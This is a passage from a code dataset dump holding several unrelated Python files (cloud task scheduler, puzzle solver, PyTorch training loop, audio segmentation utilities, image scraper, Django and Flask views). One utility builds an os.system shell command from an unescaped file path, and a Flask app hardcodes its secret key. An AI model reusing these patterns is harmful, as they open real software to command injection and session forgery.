import datastore\nfrom flask import jsonify\n\nlocation_id = os.environ.get('LOCATION_ID', '')\nprojec_id = os.environ.get('PROJECT_ID', '')\nqueue_id = os.environ.get('QUEUE_ID', '')\nurl_function_consumidor = os.environ.get('URL_FUNCTION_CONSUMIDOR', '')\nurl_api_actualizar_pedido = os.environ.get('URL_API_ACTUALIZAR_PEDIDO', '')\n\nclient = tasks_v2.CloudTasksClient()\ndatastore_client = datastore.Client()\nkind = \"Agenda\"\n\n\ndef funcion_agendar_lotes(datos):\n\n print(location_id)\n print(projec_id)\n print(queue_id)\n print(url_function_consumidor)\n print(url_api_actualizar_pedido)\n\n data = datos.get_json(force=True)\n print(data)\n if data == None:\n return \"No se recibe información\", 400\n try:\n\n # Creación de un objeto para consumo de de la entidad a trabajar\n query = datastore_client.query(kind=kind)\n query.add_filter(\"estado\",\"=\",data['estado'])\n results = list(query.fetch())\n\n registros = jsonify(results)\n\n for registro in registros:\n\n print(\"Inicia Productor\") \n parent = client.queue_path(projec_id, location_id, queue_id)\n task = {\n \"http_request\": { \n \"http_method\": tasks_v2.HttpMethod.POST,\n \"url\": url_function_consumidor,\n \"headers\": {\n \"Content-type\": \"application/json\"\n },\n 'body':json.dumps({'id':registro['id'], 'operationId':'AGENDADO', 'pickupDate':registro['pickupDate'], 'deliveryDate':registro['deliveryDate']}).encode()\n }\n }\n response = client.create_task(parent= parent, task= task)\n\n return {\n 'message': 'Se crea la tarea envios los alpes de manera exitosa',\n 'name': response.name,\n 'http_request': {\n 'url' : response.http_request.url,\n 'http_method' : str(response.http_request.http_method)\n }\n } \n \n except:\n return \"Pedido No actualizado\", 404","repo_name":"mauricio-corredor/entrega_3","sub_path":"ApiFunctions/funcion_agendamiento_lotes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17171517241","text":"import copy\n\"\"\"反転させる順番が関係ないときは、自分で解が一意に定まるように操作する\n pythonの関数はリストも参照渡しのため注意が必要\"\"\"\n\n\ndef print_ans(height, width, ans, flip):\n if ans == -1:\n # 解がない\n print(\"IMPOSSIBLE\")\n else:\n for i in range(height):\n for j in range(width):\n print(flip[i][j], end=\" \")\n print()\n\n\ndef change_tile(height, width, tile, h, w):\n tile[h][w] += 1 # 今のタイルを反転させる\n if h - 1 >= 0:\n tile[h-1][w] += 1 # 上のタイルを反転させる\n if h + 1 < height:\n tile[h + 1][w] += 1 # 下のタイルを反転させる\n if w - 1 >= 0:\n tile[h][w - 1] += 1 # 左のタイルを反転させる\n if w + 1 < width:\n tile[h][w + 1] += 1 # 右のタイルを反転させる\n return tile\n\n\ndef cal_num(height, width, flip):\n num = 0\n for h in range(height):\n for w in range(width):\n num += flip[h][w]\n return num\n\n\ndef cal_fliptile(height, width, tile, flip):\n for h in range(1, height):\n for w in range(width):\n if tile[h-1][w] % 2 == 1:\n flip[h][w] = 1\n tile = change_tile(height, width, tile, h, w)\n\n # 全て白であるかチェック\n for w in range(width):\n if tile[height - 1][w] % 2 == 1:\n # 黒のタイルがある\n return -1, flip\n\n # 反転したタイルの数\n num = cal_num(height, width, flip)\n return num, flip\n\n\ndef change_tile_0(height, width, tile, flip, w):\n if w < width:\n # 値渡しにするための処理\n tile1 = copy.deepcopy(tile)\n flip1 = copy.deepcopy(flip)\n tile2 = copy.deepcopy(tile)\n flip2 = copy.deepcopy(flip)\n\n num1, flip1 = change_tile_0(height, width, tile1, flip1, w+1)\n\n flip2[0][w] = 1\n tile2 = change_tile(height, width, tile2, 0, w)\n num2, flip2 = change_tile_0(height, width, tile2, flip2, w+1)\n\n # 解が存在するとき小さい方を返す\n if num1 < 0 and num2 < 0:\n return num2, flip2\n elif num1 > 0 and num2 < 0:\n return num1, flip1\n elif num1 < 0 and num2 > 0:\n return num2, flip2\n else:\n if num1 < num2:\n return num1, flip1\n else:\n return num2, flip2\n\n else:\n # 1行目が決まったとき\n copy_flip = copy.deepcopy(flip)\n copy_tile = copy.deepcopy(tile)\n num, copy_flip = cal_fliptile(height, width, copy_tile, copy_flip)\n return num, copy_flip\n\n\ndef main():\n # 入力と初期化\n height = int(input())\n width = int(input())\n tile = [[] for j in range(height)]\n flip = [[0 for i in range(width)] for j in range(height)]\n for i in range(height):\n tile[i] = [int(i) for i in input().split()]\n\n num, flip = change_tile_0(height, width, tile, flip, 0)\n print_ans(height, width, num, flip)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tomoki-Kikuta/ari_book","sub_path":"intermediate/python/fliptile.py","file_name":"fliptile.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40037337741","text":"from cProfile import run\nfrom msilib.schema import Class\nfrom dataloader import inaturalist\nfrom model import Classifier\nimport torch.nn as nn\nimport torch.optim as optim\nimport os\nimport time\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchsummary import summary\n\n# to import a pretrained model for testing\nimport torchvision.models\n\n# Sections to Fill: Define Loss function, optimizer and model, Train and Eval functions and the training loop\n\n############################################# DEFINE HYPERPARAMS #####################################################\n# Feel free to change these hyperparams based on your machine's capactiy\nbatch_size = 32\nepochs = 20\nlearning_rate = 0.001\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n# device = 'cpu'\n\n############################################# DEFINE DATALOADER #####################################################\ntrainset = inaturalist(root_dir='../nature_12K/inaturalist_12K', mode='train')\nvalset = inaturalist(root_dir='../nature_12K/inaturalist_12K', mode = 'val')\n# trainset = inaturalist(root_dir='../monkey_dataset', mode='train')\n# valset = inaturalist(root_dir='../monkey_dataset', mode = 'val')\n\ntrainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)\nvalloader = DataLoader(valset, batch_size=1, shuffle=False, num_workers=2)\n\n################################### DEFINE LOSS FUNCTION, MODEL AND OPTIMIZER ######################################\n# USEFUL LINK: https://pytorch.org/docs/stable/nn.html#loss-functions\n#---Define the loss function to use, model object and the optimizer for training---#\n\n# different type of images\nno_of_classes=10\n# cross entropy loss is better for classification problems\nloss_fn=nn.CrossEntropyLoss()\n# to --> if cuda(here present) then use cuda or else cpu\n# model=Classifier(no_of_classes).to(device)\nmodel=torchvision.models.resnet50(weights=None) # Resnet is trained on imagenet\nno_features=model.fc.in_features\nmodel.fc=nn.Linear(no_features, no_of_classes)\nmodel=model.to(device)\n\n# usual momentum=0.9 to converge faster\n# optimizer=optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9, weight_decay=0.03)\noptimizer = optim.Adam(model.parameters(), lr=0.001, weight_decay=0.0001)\n\n# Path for checkpoint\npath='./checkpoints/checkpoints.pt'\n\n################################### CREATE CHECKPOINT DIRECTORY ####################################################\n# NOTE: If you are using Kaggle to train this, remove this section. Kaggle doesn't allow creating new directories.\ncheckpoint_dir = 'checkpoints'\nif not os.path.isdir(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n\n#################################### HELPER FUNCTIONS ##############################################################\n\ndef get_model_summary(model, input_tensor_shape):\n summary(model, input_tensor_shape)\n print(\"\\n\\n\")\n\ndef train(model, dataset, optimizer, criterion, device, best_accuracy, epoch_now):\n model.train()\n correct=0\n total=0\n for img_data in dataset:\n img, label=img_data\n img=img.to(device)\n label=label-1\n label=label.to(device)\n \n # IMP\n # set gradients to zero\n optimizer.zero_grad()\n \n # current output after training\n output=model(img)\n \n total+=label.size(0)\n _, predicted = torch.max(output.data, 1)\n \n correct+=(predicted == label).sum().item()\n # print(predicted, label)\n # print(correct, total)\n \n # modify loss\n loss=criterion(output, label)\n # back propogation\n loss.backward()\n # Performs a single optimization step (parameter update)\n optimizer.step()\n \n accuracy=100.00*correct/total\n print(\"Accuracy in Traning :\" +str(accuracy))\n \n if accuracy > best_accuracy:\n best_accuracy=accuracy\n torch.save({\n 'epoch': epoch_now,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()\n }, path)\n print(\"Checkpoint saved\")\n print(\"Best Accuracy till now:\" +str(best_accuracy)+\"\\n\") \n \n return best_accuracy \n \n \ndef eval(model, dataset, device):\n model.eval()\n correct=0\n total=0\n with torch.no_grad():\n for img_data in dataset:\n img, label=img_data\n img=img.to(device)\n label=label-1\n label=label.to(device)\n \n # set gradients to zero\n optimizer.zero_grad()\n \n # current output after evaluating\n output=model(img)\n \n total+=label.size(0)\n _, predicted = torch.max(output.data, 1)\n correct+=(predicted == label).sum().item()\n # print(predicted, label)\n # print(correct, total)\n \n accuracy=100.00*correct/total\n print(\"Accuracy in Evaluation:\" +str(accuracy)) \n \n\ndef epoch_time(start_time, end_time):\n elapsed_time = end_time - start_time\n elapsed_mins = int(elapsed_time / 60)\n elapsed_secs = int(elapsed_time - (elapsed_mins * 60))\n return elapsed_mins, elapsed_secs\n\n################################################### TRAINING #######################################################\n\n#Training and Validation\nbest_valid_loss = float('inf')\n\ndef main():\n # Get model Summary\n get_model_summary(model, (3, 256, 256))\n \n # curr_epoch=0\n best_accuracy=0\n for epoch in range(epochs):\n start_time = time.monotonic()\n \n #------YOUR CODE HERE-----#\n print(\"Epoch \"+str(epoch+1))\n if os.path.exists(path):\n checkpoint = torch.load(path)\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n curr_epoch = checkpoint['epoch']\n # print(\"Epoch saved upto \"+str(curr_epoch))\n print(\"Checkpoint is loaded\\n\")\n best_accuracy=train(model, trainloader, optimizer, loss_fn, device, best_accuracy, epoch+1)\n eval(model, valloader, device)\n\n end_time = time.monotonic()\n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n\n print(\"TIME TAKEN FOR THE EPOCH {}: {} mins and {} seconds\\n\\n\".format(epoch+1, epoch_mins, epoch_secs))\n\n print(\"OVERALL TRAINING COMPLETE\")\n \nif __name__ == '__main__':\n main()","repo_name":"sanjaysj6282/Image_classification_pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25910671026","text":"from utilities.FE_utilities import * \nfrom utilities.scores import * \nfrom utilities.models import *\n\n\n\ndef pipeline_for_cleaning(df):\n df= log_transfrom_columns(df)\n df= decide_peak_period(df,[\"date_end\",\"date_renewal\"])\n x= df.id\n drop_columns(df)\n df[\"id\"]= x\n df= one_hot_encoding(df,catFeatures=[\"channel_sales\",\"origin_up\"])\n return df \n\n\n\ndef simple_pipeline(df,sampling_type=1):\n '''\n make log transofrmation for skewed columns \n extract peak periods \n drop columns the non used columns \n - split data \n then make normalization \n make upsampling OR Downsampling or Non depending on sampling_type\n '''\n df= log_transfrom_columns(df)\n df= extract_date_info(df)\n df= decide_peak_period(df,[\"date_end\",\"date_renewal\"])\n drop_columns(df)\n df= one_hot_encoding(df,catFeatures=[\"channel_sales\",\"origin_up\"])\n X_train, X_test, y_train, y_test= split_x_y(df)\n \n X_train, X_test= normalize(X_train, X_test)\n \n \n X_train,y_train = sampling(X_train,y_train,sampling_type)\n\n \n return X_train, X_test, y_train, y_test\n\n\n\ndef simple_pipeline_cleaned_data(df,sampling_type=1):\n '''\n for cleaned ddataframes \n - split \n - normalize \n - sampling\n '''\n \n X_train, X_test, y_train, y_test= split_x_y(df) \n X_train, X_test= normalize(X_train, X_test)\n \n \n X_train,y_train = sampling(X_train,y_train,sampling_type)\n\n return X_train, X_test, y_train, y_test\n\n\n\n\n\n\n\n\ndef division_pipeline(df):\n drop_columns(df)\n df= one_hot_encoding(df,catFeatures=[\"channel_sales\",\"origin_up\"])\n \n \n \n X_train, X_test, y_train, y_test= split_x_y(df)\n X_train, X_test= normalize_min_max(X_train, X_test)\n\n return X_train, X_test, y_train, y_test\n","repo_name":"ahmedtarek1325/Day-BCG_PowerCompany_churn","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27453283720","text":"import os\nimport pandas as pd\nimport numpy as np\n\n\ndef triang(start, mid, stop, equal=False):\n \"\"\"\n Calculates a triangular window of the given size. Taken from\n https://github.com/CPJKU/onset_detection/blob/master/onset_program.py\n\n :param start: starting bin (with value 0, included in the returned filter)\n :param mid: center bin (of height 1, unless norm is True)\n :param stop: end bin (with value 0, not included in the returned filter)\n :param equal: normalize the area of the filter to 1 [default=False]\n :return a triangular shaped filter\n\n \"\"\"\n # height of the filter\n height = 1.\n # normalize the height\n if equal:\n height = 2. / (stop - start)\n # init the filter\n triang_filter = np.empty(stop - start)\n # rising edge\n triang_filter[:mid - start] = np.linspace(0, height, (mid - start), endpoint=False)\n # falling edge\n triang_filter[mid - start:] = np.linspace(height, 0, (stop - mid), endpoint=False)\n # return\n return triang_filter\n\n\ndef mel_filterbank(num_bands, fft_size, sample_rate):\n \"\"\"\n Returns a filter matrix for a Mel filter bank.\n\n :param num_bands: number of filter bands\n :param fft_size: number of fft bins\n :param sample_rate: sample rate\n :return filterbank matrix\n \"\"\"\n\n freq_ector = np.asarray([x * sample_rate / fft_size for x in xrange(0, fft_size)])\n\n frequencies = np.asarray([2595.0 * np.log10(1.0 + f / 700.0) for f in freq_ector])\n\n max_f = np.max(frequencies)\n min_f = np.min(frequencies)\n\n mel_bin_width = (max_f - min_f) / num_bands\n filterbank = np.zeros((fft_size, num_bands), dtype=np.float)\n\n for i in xrange(num_bands):\n\n idx_filter_1 = np.where(frequencies >= (i-1)*mel_bin_width + min_f)\n idx_filter_2 = np.where(frequencies <= (i+1)*mel_bin_width + min_f)\n idx_filter = np.intersect1d(idx_filter_1, idx_filter_2)\n\n if idx_filter.size == 0:\n continue\n\n start_idx = idx_filter[0]\n end_idx = idx_filter[-1]\n mid_idx = start_idx + np.floor((end_idx - start_idx) / 2)\n\n win = triang(start_idx, mid_idx, end_idx)\n filterbank[start_idx:start_idx+win.size, i] = win\n\n # return the list\n return filterbank\n\n\ndef get_segment_times(audio_file, annotation_folder):\n \"\"\"\n Read segment start times from annotation file.\n :param audio_file: path to audio file\n :param annotation_folder: folder where annotations from SALAMI are stored\n :return: segment start times in seconds\n \"\"\"\n\n file_name = os.path.splitext(os.path.basename(audio_file))[0]\n\n # for some tracks, only one annotation is available, take first one as default\n # if there is no annotation available, store -1 as error code\n try:\n label_file = os.path.join(annotation_folder, file_name, 'parsed', 'textfile1_uppercase.txt')\n t = pd.read_table(label_file, header=None)\n except IOError:\n try:\n label_file = os.path.join(annotation_folder, file_name, 'parsed', 'textfile2_uppercase.txt')\n t = pd.read_table(label_file, header=None)\n except IOError:\n return -1\n\n segment_times = t.iloc[:, 0].values\n\n return segment_times\n\ndef get_beat_times(audio_file, beats_folder, include_beat_numbers=False):\n \"\"\"\n Read beat times from annotation file.\n :param audio_file: path to audio files\n :param beats_folder: folder with preanalysed beat times (in .beats.txt format per track)\n :return: beat times in seconds\n \"\"\"\n\n file_name = os.path.splitext(os.path.basename(audio_file))[0]\n beats_file = os.path.join(beats_folder, file_name + '.beats.txt')\n\n if not os.path.isfile(beats_file):\n print(f\"Extracting beat times for {audio_file}\")\n os.system(f\"DBNDownBeatTracker single '{audio_file}' -o '{beats_file}'\")\n\n t = pd.read_table(beats_file, header=None)\n\n if include_beat_numbers:\n return t[0].values, t[1].values\n else:\n return t[0].values\n\n","repo_name":"mleimeister/SegmentationCNN","sub_path":"Python/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"7"} +{"seq_id":"74340224544","text":"#!/usr/bin/env python\n\nimport sys\n\ndef tracer(frame, event, arg):\n if event == 'call':\n print(frame.f_code.co_name)\n print(frame.f_code.co_code)\n return None\n\ndef parent():\n for i in range(3):\n child()\n return 'parent done'\n\ndef child():\n for i in range(5):\n print('in child loop')\n return 'child done'\n\nif __name__ == '__main__':\n sys.settrace(tracer)\n parent()\n sys.settrace(None)\n","repo_name":"toffer/talk-custom-tracing","sub_path":"examples/scripts/print_bytestring.py","file_name":"print_bytestring.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71156807584","text":"\n# coding: utf-8\n\nimport sys\nimport os\nimport urllib\nfrom bs4 import BeautifulSoup\n\n# url to parse\n#url_to_parse = 'https://rocjoker0120.artstation.com/'\n# in this directory will be created folder where all images will be saved\n#dir_for_save = 'C:\\\\Users\\\\Michael\\\\Desktop\\\\Collages'\n\n\ndef image_downloader(url_to_parse, dir_for_save=os.getcwd()):\n sauce = urllib.request.urlopen(url_to_parse)\n soup = BeautifulSoup(sauce, 'lxml')\n\n artist_dir = url_to_parse.split('//')[1].split('.')[0]\n new_cwd = dir_for_save + '\\\\' + artist_dir\n if not os.path.exists(new_cwd):\n os.makedirs(new_cwd)\n os.chdir(new_cwd)\n\n # will print image number\n img_number = 1\n for url in soup.find_all('a'):\n #print(url.get('href'))\n # get artist projects page and collect links\n cur_url = url.get('href')\n if cur_url.find('projects') != -1:\n if url_to_parse.find('projects') == -1:\n project_url = url_to_parse + cur_url\n else:\n project_url = url_to_parse + '/' + cur_url.split('/')[-1]\n print(project_url)\n try:\n sauce = urllib.request.urlopen(project_url)\n except urllib.error.HTTPError as err:\n print(err.code)\n soup = BeautifulSoup(sauce, 'lxml')\n imgs = soup.find_all(\"img\") \n for img in imgs:\n #print(img.get('src'))\n img_url = img.get('src')\n if img_url.find('large') != -1:\n img_name = project_url.split('/')[-1] + '-' + img_url.split(\"/\")[-1].split(\"?\")[0]\n print(str(img_number) + '. ' + img_name)\n try:\n urllib.request.urlretrieve(img_url, img_name)\n img_number = img_number + 1\n except urllib.error.HTTPError as err:\n print(err.code)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n url_to_parse = sys.argv[1]\n image_downloader(url_to_parse)\n elif len(sys.argv) > 2:\n url_to_parse = sys.argv[1]\n dir_for_save = sys.argv[2]\n image_downloader(url_to_parse, dir_for_save)\n else:\n print('\\nPlease specify two arguments:\\n1. URL to artist projects page\\n2. Path to directory where you want to save folder with downloaded images\\n *if only URL is given folder with images will be created in current directory')\n\n","repo_name":"GhostCatcg/artstation_images_downloader","sub_path":"artstation_image_downloader.py","file_name":"artstation_image_downloader.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35981995962","text":"from timer import timer\n\n\ndef load_dictionary(filename):\n with open(filename) as file:\n words = file.read().splitlines()\n return {k: None for k in words}\n\n\ndef english_count(sentence: str):\n dictionary = load_dictionary('dictionary.txt')\n split_sentence = [word.upper() for word in sentence.split(' ')]\n matches = 0\n for word in split_sentence:\n if word in dictionary:\n matches += 1\n return matches\n\n\n@timer\ndef is_english(sentence: str):\n matches = english_count(sentence)\n percentage = float(matches) / len(sentence.split(' ')) * 100\n print(f'{percentage}% of the words in the sentence are English.')\n\n\nis_english('This is my sentence sentence')\n","repo_name":"adamhartleb/cracking_codes","sub_path":"detect_english.py","file_name":"detect_english.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33197942748","text":"import operator\nfrom datetime import timedelta, datetime\nfrom functools import reduce\n\nfrom pomodorr.frames.exceptions import DateFrameException as DFE\nfrom pomodorr.frames.selectors.date_frame_selector import get_breaks_inside_date_frame, get_pauses_inside_date_frame\n\n\nclass DurationCalculatorLoader:\n def __init__(self, date_frame_object, end: datetime) -> None:\n self._date_frame_model = date_frame_object.__class__\n\n if date_frame_object.frame_type == self._date_frame_model.pomodoro_type:\n self._calculator_strategy = PomodoroDurationCalculator(date_frame_object=date_frame_object, end=end)\n elif date_frame_object.frame_type == self._date_frame_model.break_type:\n self._calculator_strategy = BreakDurationCalculator(date_frame_object=date_frame_object, end=end)\n elif date_frame_object.frame_type == self._date_frame_model.pause_type:\n self._calculator_strategy = PauseDurationCalculator(date_frame_object=date_frame_object, end=end)\n else:\n raise DFE(DFE.messages[DFE.invalid_date_frame_type])\n\n def calculate(self) -> timedelta:\n return self._calculator_strategy.get_duration()\n\n\nclass DurationCalculator:\n def __init__(self, date_frame_object, end: datetime) -> None:\n self._date_frame_object = date_frame_object\n self._date_frame_model = self._date_frame_object.__class__\n self._end = end\n\n def get_duration(self) -> timedelta:\n return self._end - self._date_frame_object.start\n\n\nclass PomodoroDurationCalculator(DurationCalculator):\n def get_duration(self) -> timedelta:\n whole_frame_duration = self._end - self._date_frame_object.start\n breaks_duration = self.get_breaks_duration()\n pauses_duration = self.get_pauses_duration()\n return whole_frame_duration - breaks_duration - pauses_duration\n\n def get_breaks_duration(self) -> timedelta:\n break_frames = get_breaks_inside_date_frame(\n date_frame_object=self._date_frame_object, end=self._end).values('start', 'end')\n breaks_duration = reduce(operator.add,\n (break_frame['end'] - break_frame['start'] for break_frame in break_frames),\n timedelta(0))\n return breaks_duration\n\n def get_pauses_duration(self) -> timedelta:\n pause_frames = get_pauses_inside_date_frame(\n date_frame_object=self._date_frame_object, end=self._end).values('start', 'end')\n pauses_duration = reduce(operator.add,\n (pause_frame['end'] - pause_frame['start'] for pause_frame in pause_frames),\n timedelta(0))\n return pauses_duration\n\n\nclass BreakDurationCalculator(DurationCalculator):\n pass\n\n\nclass PauseDurationCalculator(DurationCalculator):\n pass\n","repo_name":"kamil559/Pomodorr_backend_v1","sub_path":"pomodorr/frames/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2406830994","text":"import pytest\nfrom config import log\nfrom test_helpers import fetch\n\ndef pytest_addoption(parser):\n parser.addoption(\n '--count',\n default=1,\n type='int',\n metavar='count',\n help='Run each test the specified number of times')\n\ndef pytest_generate_tests(metafunc):\n for _i in range(metafunc.config.option.count):\n metafunc.addcall()\n\n@pytest.fixture(scope=\"function\")\ndef log_test_start(request):\n log.debug(\"[%s] start\" % request.function.__name__)\n # Mark test start in nginx.log\n fetch(\"/psol_test_start_%s\" % request.function.__name__, method = \"HEAD\",\n allow_error_responses = True)\n def log_test_end():\n # Mark test end in nginx.log\n log.debug(\"[%s] end\\n\\n\" % request.function.__name__)\n fetch(\"/psol_test_end_%s\" % request.function.__name__, method = \"HEAD\",\n allow_error_responses = True)\n\n request.addfinalizer(log_test_end)\n","repo_name":"We-Amp/psol_pytest","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12659082734","text":"from typing import List\n\nfrom ckeditor.fields import RichTextField\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.db import models\nfrom model_utils.models import TimeStampedModel\n\nfrom .custom_templates import get_full_copy_template\nfrom .sendgrid import mass_send_personalized_mail, send_personalized_mail\nfrom .utils import attach_files, random_name_in\n\n\nclass EmailTemplate(TimeStampedModel):\n name = models.CharField(\n max_length=255,\n unique=True,\n help_text=\"Unique name used to identify this message\",\n )\n\n # SendGrid\n sendgrid_template_id = models.CharField(\n max_length=255,\n blank=True,\n null=True,\n )\n\n # Core\n subject = models.CharField(\n max_length=255, blank=True, null=True, help_text=\"Email subject line\"\n )\n html_content = RichTextField(\n blank=True,\n help_text=\"Text that will be inputted into Template html version\",\n null=True,\n )\n plain_text_content = RichTextField(\n blank=True,\n help_text=\"Text that will be inputted into Template plain text version\",\n )\n\n class Meta:\n ordering = [\"-id\"]\n\n def send_via_sendgrid(self, personalization, attachments=[]):\n if not self.sendgrid_template_id:\n raise Exception(\"SendGrid template ID required to send message via SendGrid\")\n send_personalized_mail(self, personalization, attachments)\n\n def mass_send_via_sendgrid(self, personalizations):\n if not self.sendgrid_template_id:\n raise Exception(\"SendGrid template ID required to send message via SendGrid\")\n mass_send_personalized_mail(self, personalizations)\n\n def send(\n self,\n recipients: List[str],\n context={},\n use_base_template=False,\n extended_with=\"\",\n attachments=[],\n ):\n if not self.html_content:\n raise Exception(\"HTML content required to send e-mail\")\n\n if not use_base_template:\n base_template_route = \"\"\n else:\n base_template_route = extended_with or settings.DEFAULT_EMAIL_TEMPLATE\n\n html_content, text_content, subject = get_full_copy_template(\n self, context, use_base_template, base_template_route\n )\n\n mail = EmailMultiAlternatives(\n subject, text_content, from_email=settings.DEFAULT_FROM_EMAIL, to=recipients\n )\n\n # combine static attachments from template with dynamic attachments\n mail.attach_alternative(html_content, \"text/html\")\n all_attachments = list(self.static_attachments.all()) + attachments\n attach_files(mail, all_attachments)\n\n mail.send()\n\n\nclass Attachment(TimeStampedModel):\n template = models.ForeignKey(\n EmailTemplate,\n related_name=\"static_attachments\",\n null=False,\n on_delete=models.CASCADE,\n )\n file = models.FileField(upload_to=random_name_in(\"copy_template_file\"))\n filename = models.CharField(\n max_length=255,\n blank=True,\n null=True,\n )\n","repo_name":"silverlogic/baseapp-backend","sub_path":"baseapp-email-templates/baseapp_email_templates/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"74810811102","text":"from json import (dumps, loads)\nfrom django.contrib.auth import (authenticate, logout, login)\nfrom django.http import (HttpResponse)\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import (csrf_exempt)\nfrom friendmap.controller import (add_user, get_users, get_friends, add_friend, get_all_connections)\n\n\n@csrf_exempt\ndef users(request):\n if request.method == 'GET':\n username = request.GET.get('username', None)\n if username:\n response = get_users(username=username)\n else:\n response = []\n return HttpResponse(dumps(response))\n elif request.method == 'POST':\n username = _get_post_param(param='username', request=request)\n password = _get_post_param(param='password', request=request)\n response = add_user(username=username, password=password)\n return HttpResponse(dumps(response))\n\n@csrf_exempt\ndef friends(request):\n if request.user is None:\n return HttpResponse(status=401)\n if request.method == 'GET':\n response = get_friends(user=request.user)\n return HttpResponse(dumps(response))\n elif request.method == 'POST':\n friend_name = _get_post_param(param='username', request=request)\n add_friend(user=request.user, friend_name=friend_name)\n return HttpResponse(status=200)\n\n@csrf_exempt\ndef whoami(request):\n if request.user is None:\n return HttpResponse(status=401)\n else:\n response = request.user.username\n return HttpResponse(dumps(response))\n\n\n@csrf_exempt\ndef all_connections(request):\n if request.user.is_superuser:\n response = get_all_connections()\n return HttpResponse(dumps(response))\n else:\n return HttpResponse(status=401)\n\n@csrf_exempt\ndef login_user(request):\n if request.method == 'POST':\n username = _get_post_param(param='username', request=request)\n password = _get_post_param(param='password', request=request)\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponse(username)\n else:\n return HttpResponse(status=401)\n else:\n return HttpResponse(status=400)\n\n\n@csrf_exempt\ndef logout_user(request):\n logout(request)\n return HttpResponse(status=200)\n\n\ndef login_form(request):\n context = {'data': 'none'}\n return render_to_response('login.html', locals(), context_instance=RequestContext(request))\n\n\ndef friend_page(request):\n context = {'data': 'none'}\n return render_to_response('friend_page.html', locals(), context_instance=RequestContext(request))\n\n\ndef admin_page(request):\n context = {'data': 'none'}\n return render_to_response('admin_page.html', locals(), context_instance=RequestContext(request))\n\n\ndef _get_post_param(param=None, request=None):\n try:\n body = request.body.decode('utf-8')\n data = loads(body)\n return data.get(param, '')\n except ValueError:\n return None","repo_name":"joejuzl/friendmap","sub_path":"friendmap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10286249786","text":"# BOJ 17298 Next Greater Element(오큰수)\nn = int(input())\narr = [*map(int, input().split())]\nres = [-1 for _ in range(n)]\nstack = [0]\ni = 1\nwhile stack and i args.max_rows_value:\n break\n output_file.write(line)\n if count > 0:\n count -= 1\n print(f'Truncated {args.input_file_path} after {count} rows.')\nexcept Exception as ex:\n raise RuntimeError(f'Error truncating file {args.input_file_path}: {ex}')\n","repo_name":"ricardo-arruda/examples","sub_path":"pipelines/run-pipelines-on-kubeflow-pipelines/components/source/truncate-file/src/truncate-file.py","file_name":"truncate-file.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"22650560409","text":"from google_hash_code_rcs.classes import Binary, Feature, Engineer, Service\n\ndef test_classes() -> None:\n \"\"\"Empty test function\n \"\"\"\n b = Binary()\n e = Engineer(id=1)\n f = Feature(services=[], users=100, difficulty=3)\n s = Service(binary=[])\n\n assert 1 == 1\n","repo_name":"nicolas-goeman/google-hash-code-RCS","sub_path":"tests/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35129556483","text":"\r\nfrom flask import Flask, flash, redirect, render_template,request,session, url_for\r\nfrom model import Model\r\n\r\napp = Flask(__name__) \r\napp.secret_key = \"1234567890\"\r\ndb = Model()\r\n\r\n@app.route('/detail/')\r\ndef detail(id):\r\n data = db.readById(id)\r\n session['detail'] = id\r\n return render_template('detail.html', data=data)\r\n\r\n # Read data\r\n@app.route('/')\r\ndef index():\r\n data=db.read()\r\n return render_template('index.html', data=data)\r\n\r\n@app.route('/formsiswa')\r\ndef tambah():\r\n return render_template('tambah.html')\r\n\r\n # Tambah data\r\n@app.route('/tambahdata', 